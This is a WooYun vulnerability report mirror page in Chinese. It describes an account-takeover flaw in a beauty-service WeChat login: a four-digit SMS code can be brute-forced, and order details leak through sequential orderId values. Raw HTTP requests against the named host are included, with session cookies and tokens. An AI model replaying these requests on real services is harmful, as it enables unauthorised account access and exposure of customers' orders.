乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-15: 厂商已经主动忽略漏洞,细节向公众公开
某上门美容O2O任意用户登陆
微信公众号登陆时,只需要手机号和验证码,验证码为四位。四位爆破
POST /site/login HTTP/1.1Host: wechat.rongmomo.ccAccept: application/json, text/javascript, */*; q=0.01Proxy-Connection: keep-aliveX-Requested-With: XMLHttpRequestAccept-Encoding: gzip, deflateAccept-Language: zh-cnContent-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://wechat.rongmomo.ccContent-Length: 112Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CNReferer: http://wechat.rongmomo.cc/site/loginCookie: PHPSESSID=rp11cavm433sb45pis0ut7jpl4; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; checkoutOrder=%7B%22order_id%22%3A85732%2C%22number%22%3A%221573785732%22%2C%22paid_amount%22%3A228%2C%22created_at%22%3A%222015-11-30+18%3A05%22%2C%22service_time%22%3A%222015-11-30+22%3A00%22%2C%22service_hours%22%3A90%2C%22finish_time%22%3A%222015-11-30+23%3A30%22%2C%22payment%22%3A1%7D; current_city=%7B%22id%22%3A%222%22%2C%22name%22%3A%22%E4%B8%8A%E6%B5%B7%E5%B8%82%22%7D; locate=1mobile=13888888888&captcha=9220&_csrf=QXFVZndmZHYJIBYURFUNOilFBAdEAxFPdTosKwVXVz03Njk%2FQRE1GQ%3D%3D&reference=0
微信公众号查看订单请求,遍历orderId即可
GET /order/detail?orderId=85731 HTTP/1.1Host: wechat.rongmomo.ccAccept-Encoding: gzip, deflateCookie: PHPSESSID=c3v80m9m1n6csbjcl792l1duc0; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; _identity=53eaab2f6b24892bb386e075219dd191974e98feeb5b731042a37313c27238ffa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B27589%2C%222v3gFv_tlIWmhhywShV72Sa6gI534BdC%22%2C2592000%5D%22%3B%7D; current_city=%7B%22id%22%3A%221%22%2C%22name%22%3A%22%E5%8C%97%E4%BA%AC%E5%B8%82%22%7D; locate=1Connection: keep-aliveProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CNAccept-Language: zh-cnReferer: http://wechat.rongmomo.cc/pay/fail?id=85732&attach=1Cache-Control: max-age=0
你们最专业
未能联系到厂商或者厂商积极拒绝